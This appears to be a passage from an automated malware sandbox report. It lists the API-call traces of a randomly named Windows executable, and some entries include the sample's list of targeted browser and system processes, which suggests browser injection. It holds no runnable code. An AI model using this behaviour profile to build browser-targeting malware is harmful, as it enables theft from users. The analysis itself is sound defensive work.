Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex25_2_01593610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AF78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe27_2_00AF6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe27_2_00AF1900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex27_2_00AE3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012B78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe29_2_012B1900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012A3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_011278A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrI
A,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformat